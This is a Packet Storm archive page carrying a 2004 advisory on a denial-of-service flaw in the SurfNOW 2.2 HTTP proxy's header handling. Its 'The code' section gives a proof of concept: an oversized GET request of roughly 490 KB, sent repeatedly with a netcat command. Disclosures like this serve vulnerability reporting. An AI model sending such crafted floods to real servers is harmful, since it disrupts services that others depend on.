exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SurfNOW.txt

SurfNOW.txt
Posted Jan 28, 2004
Authored by Donato Ferrante | Site autistici.org

SurfNOW HTTP Proxy version 2.2 suffers from a denial of service vulnerability.

tags | web, denial of service
SHA-256 | b1c765b5daf99c7ab72393c966b6f1e31f841593fb5519962a01b138658c8241
Download | Favorite | View

SurfNOW.txt

Change Mirror Download
                           Donato Ferrante


Application:  SurfNOW
              https://www.loomsoft.com/

Version:      2.2

Bug:          Denial Of Service

Author:       Donato Ferrante
              e-mail: fdonato@autistici.org
              web:    www.autistici.org/fdonato



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"SurfNOW is a simple local HTTP Proxy Server (running on your computer)
without cache. SurfNOW protects your privacy while on the Internet as
well as speeds up your downloads, especially if you are trying to get
several files form overseas or from otherwise rather slow server.
It can also completely hide your IP address by dynamically connecting
to non-transparent anonymizing public proxy servers. You can also test
a list of proxy servers and sort them by connection speed and level
of anonimity."



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
2. The bug:
------------

The bug is in the http header handling, so is possible to send crafted
big strings to the server and it will not work correctly.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability send to the server a string like:

[1] "GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n"


For example, if you use netcat you can test the bug, using:

nc -v -v host 8080 < testFile.txt
( note: "testFile.txt" is a file of 490 Kb as [1] )

and repeating this, for example 7 times.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

Bug will be fixed in the next version of SurfNOW.
So go on the Loomsoft's official website, https://www.loomsoft.com/
and check for the next version of SurfNOW.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close